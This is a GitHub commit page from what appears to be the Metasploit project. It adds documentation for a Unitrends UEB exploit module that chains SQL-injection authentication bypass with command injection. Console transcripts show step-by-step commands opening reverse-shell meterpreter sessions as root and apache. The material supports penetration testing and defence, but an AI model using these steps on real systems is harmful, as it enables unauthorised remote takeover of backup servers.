-
Notifications
You must be signed in to change notification settings - Fork 13.9k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Land #10616, update Unitrends UEB module to support vulnerabilities i…
…n version 10
- Loading branch information
Showing
3 changed files
with
142 additions
and
57 deletions.
There are no files selected for viewing
42 changes: 0 additions & 42 deletions
42
documentation/modules/exploit/linux/http/ueb9_api_storage.md
This file was deleted.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Original file line | Diff line number | Diff line change |
---|---|---|---|
@@ -0,0 +1,93 @@ | |||
## Vulnerable Application | |||
|
|||
This exploit leverages a sqli vulnerability for authentication bypass, | |||
together with command injection for subsequent RCE. | |||
|
|||
This exploit has two targets: | |||
|
|||
1. Unitrends UEB 9 http api/storage RCE for root privileges | |||
2. Unitrends UEB < 10.1.0 api/hosts RCE for user (apache) privileges | |||
|
|||
## Verification Steps | |||
|
|||
1. ```use exploit/linux/http/ueb_api_rce``` | |||
2. ```set lhost [IP]``` | |||
3. ```set rhost [IP]``` | |||
4. ```set target [#]``` | |||
5. ```exploit``` | |||
6. A meterpreter session should have been opened successfully | |||
|
|||
## Scenarios | |||
|
|||
### UEB 9.2 on CentOS 6.5 Using api/storage (target 0) root exploit | |||
|
|||
``` | |||
msf5 > use exploit/linux/http/ueb_api_rce | |||
msf5 exploit(linux/http/ueb_api_rce) > set target 0 | |||
target => 0 | |||
msf5 exploit(linux/http/ueb_api_rce) > set rhost 1.1.1.1 | |||
rhost => 1.1.1.1 | |||
msf5 exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2 | |||
lhost => 2.2.2.2 | |||
msf5 exploit(linux/http/ueb_api_rce) > exploit | |||
[*] Started reverse TCP handler on 2.2.2.2:4444 | |||
[*] 1.1.1.1:443 - Sending requests to UEB... | |||
[*] Command Stager progress - 19.76% done (164/830 bytes) | |||
[*] Command Stager progress - 39.16% done (325/830 bytes) | |||
[*] Command Stager progress - 56.87% done (472/830 bytes) | |||
[*] Command Stager progress - 74.82% done (621/830 bytes) | |||
[*] Command Stager progress - 92.77% done (770/830 bytes) | |||
[*] Command Stager progress - 110.48% done (917/830 bytes) | |||
[*] Sending stage (861480 bytes) to 1.1.1.1 | |||
[*] Command Stager progress - 126.63% done (1051/830 bytes) | |||
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:43600) at 2018-09-10 20:51:16 -0400 | |||
meterpreter > sysinfo | |||
Computer : 1.1.1.1 | |||
OS : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64) | |||
Architecture : x64 | |||
BuildTuple : i486-linux-musl | |||
Meterpreter : x86/linux | |||
meterpreter > getuid | |||
Server username: uid=0, gid=0, euid=0, egid=0 | |||
``` | |||
|
|||
### UEB 9.2 on CentOS 6.5 Using api/hosts (target 1) exploit | |||
|
|||
``` | |||
msf5 > use exploit/linux/http/ueb_api_rce | |||
msf5 exploit(linux/http/ueb_api_rce) > set target 1 | |||
target => 1 | |||
msf5 exploit(linux/http/ueb_api_rce) > set rhost 1.1.1.1 | |||
rhost => 1.1.1.1 | |||
msf5 exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2 | |||
lhost => 2.2.2.2 | |||
msf5 exploit(linux/http/ueb_api_rce) > exploit | |||
[*] Started reverse TCP handler on 2.2.2.2:4444 | |||
[*] 1.1.1.1:443 - Sending requests to UEB... | |||
[*] Command Stager progress - 19.76% done (164/830 bytes) | |||
[*] Command Stager progress - 39.16% done (325/830 bytes) | |||
[*] Command Stager progress - 56.87% done (472/830 bytes) | |||
[*] Command Stager progress - 74.82% done (621/830 bytes) | |||
[*] Command Stager progress - 92.77% done (770/830 bytes) | |||
[*] Command Stager progress - 110.48% done (917/830 bytes) | |||
[*] Sending stage (861480 bytes) to 1.1.1.1 | |||
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:43515) at 2018-09-10 20:46:24 -0400 | |||
[*] Command Stager progress - 126.63% done (1051/830 bytes) | |||
meterpreter > sysinfo | |||
Computer : 1.1.1.1 | |||
OS : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64) | |||
Architecture : x64 | |||
BuildTuple : i486-linux-musl | |||
Meterpreter : x86/linux | |||
meterpreter > getuid | |||
Server username: uid=48, gid=48, euid=48, egid=48 | |||
meterpreter > shell | |||
Process 25534 created. | |||
Channel 1 created. | |||
whoami | |||
apache | |||
``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters